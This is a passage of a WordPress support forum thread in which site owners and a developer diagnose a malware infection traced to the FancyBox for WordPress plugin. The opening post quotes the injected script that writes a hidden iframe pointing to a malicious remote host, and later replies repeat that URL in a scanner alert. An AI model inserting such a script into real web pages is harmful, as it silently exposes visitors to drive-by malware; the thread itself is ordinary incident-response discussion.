• Resolved SherabGyamtso

    (@sherabgyamtso)


    I have last version of your plugin and WordPress.

    Everything was ok until today. I’ve got a report from sitelock that my Contact page on my blog is infected with malware with iframe redirecting to h t t p : / / 203koko.eu/hjnfh/ipframe2.php

    Chcecked my page source on this contact page and found something like this:

    <script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(‘ <div style=”position:absolute;left:-2000px;width:2000px”><iframe src=”https://203koko.eu/hjnfh/ipframe2.php&#8221; width=”20″ height=”30″ ></iframe></div>’);}/*]]>*/</script>

    I desactivated just Total Cache and this page is not infected anymore.

    I have other plugins (up to date) active:

    Akismet Version 3.0.4
    Custom Posts Per Page Version 1.7.1
    FancyBox for WordPress Version 3.0.2
    GetSocial Version 2.0.1
    NextCellent Gallery Version 1.9.25.1
    Official StatCounter Plugin Version 1.6.9
    Use Google Libraries Version 1.6.2
    WordPress SEO Version 1.7.1

    Can anybody helps me to determine source of this malware?

    Best

    Maciek

    https://www.ads-software.com/plugins/w3-total-cache/

Viewing 15 replies - 61 through 75 (of 110 total)
  • My sites had been hacked around December too, not sure if maybe Nextgen gallery is also affected as I had found some attempts of cross scripting. Anyone able to help?

    I know mine was hacked through the Showbiz slider plug-in, which was patched pretty quickly after it became known in November… I didn’t act quickly enough on the update as all this is new to me, but fortunately I have an expert over in the USA who fixed it for me in around 6 hours.

    I subscribed to WordPress Tavern and now such things arrive in my inbox so I can take quick action. Hope you get it sorted, Stephen as it is no fun.

    I can recommend UpdraftPlus for back-ups so you can restore back to a clean installation fairly easily.

    If I understand correctly:

    1) all bad stuff was loaded via mysql – no actual files were changed, right?

    2) the plugin update had to remove that bad stuff.

    3) if you run the query: select * from wp_options where option_name = 'mfbfw'; and you get results like: a:37:{s:11:"borderColor";s:7:"#BBBBBB";s:15:"showC – everything is good at site is not infected.

    Can anyone with the knowledge confirm that?

    Thank you!

    Tomas,

    1. The bad stuff was loaded into the database, files weren’t changed as far as we’ve seen.
    2. The plugin update did not remove the bad stuff, but stopped reading it, by renaming the extraCalls key. This way it is no longer read even if it still has bad stuff in it.
    3. This is the correct way to inspect the database for this particular infection, however look into the string to find the extraCalls key, what you pasted doesn’t contain it, so can’t be sure what it has in your particular case. If it’s empty you’re good.

    @gennady,

    Are you 100% sure that is a Zero-day in the “Fancybox-for-WordPress” plugin?

    Here is what WordFence alerted me with about one hour ago…

    File contains suspected malware URL: /wp-content/cache/object/000000/1ad/4a6/1ad4a675471b40c7b78ff40296e03d97.php
    Filename:	wp-content/cache/object/000000/1ad/4a6/1ad4a675471b40c7b78ff40296e03d97.php
    Bad URL:	https://203koko.eu/hjnfh/ipframe2.php
    File type:	Not a core, theme or plugin file.
    Issue first detected:	14 secs ago.
    Severity:	Critical
    Status	New

    The thing is that i am always up-to-date with WordPress core, plugins & themes.
    I have NEVER used “Fancybox-for-WordPress” plugin! The theme that i use most is “Responsive”https://www.ads-software.com/themes/responsive and lately “Newspaper”https://themeforest.net/item/newspaper/5489609

    Generally i use these plugins

    • Akismet
    • Broken Link Checker
    • Contact Form 7
    • Custom Permalinks
    • Disqus Comment System
    • Duplicator
    • GetSocial
    • Google Analytics by Yoast
    • Google XML Sitemaps
    • Redirection
    • Revolution Slider
    • tagDiv Social Counter
    • Theme Authenticity Checker (TAC)
    • W3 Total Cache
    • Wordfence Security
    • WordPress SEO
    • WP-Optimize
    • WPBakery Visual Composer

    Also running this query
    select * from optblg_options where option_name = 'mfbfw';
    MySQL returned an empty result set (i.e. zero rows). (Query took 0.0003 sec)

    Yet, I am on a shared hosted environment ??

    Any thoughts?

    @kanenas, /wp-content/cache/object/000000/1ad/4a6/1ad4a675471b40c7b78ff40296e03d97.php is a cached page, mind if you send it over to me please at gennady[at]kovshenin[dot]com for quick analysis?

    Remember, since FancyBox for WordPress is open-source anyone could have bundled it with a theme or a plugin. Bundling plugins with themes to auto-enable them is well-known. So that’s one option.

    Will be happy to investigate. Shoot me an e-mail.

    Unfortunately it looks like the patch for this vulnerability has caused additional issues within the plugin, namely, a broken portion of the options page – https://www.cryptobells.com/fancybox-for-wordpress-zero-day-and-broken-patch/

    @gennady,

    Unfortunately, i have already deleted the folder wp-content/cache/object/000000 to make a new WordFence scan ??

    @kanenas, no backups from yesterday or the day before? Send me your website via email, please, I’ll take a look at it from the outside and try to exploit the vulnerability manually.

    @gennady, i have send you an email with subject “Zero-day in Fancybox-for-WordPress plugin”.

    @kanenas is your Revolution Slider plugin up to date? It was vulnerable to an exploit not long ago.

    @stephen, as i wrote “i am always up-to-date with WordPress core, plugins & themes”, that includes the “Revolution Slider” plugin.

    Only reason I bring it up, is because some plugins don’t show that it has an update and you have to download it manually from wherever you bought it from. I can read.

    Administrators who had the vulnerable version of this plugin installed should also consider resetting their user sessions and credentials. The patch issued yesterday closes the exploit vector within the plugin, but depending on how an attacker chose to exploit the vulnerability, it could have lead to compromised user credentials or arbitrary code execution in the admin panel (this would have been a separate attack than the iframe being reported here).

Viewing 15 replies - 61 through 75 (of 110 total)
  • The topic ‘Possible malware’ is closed to new replies.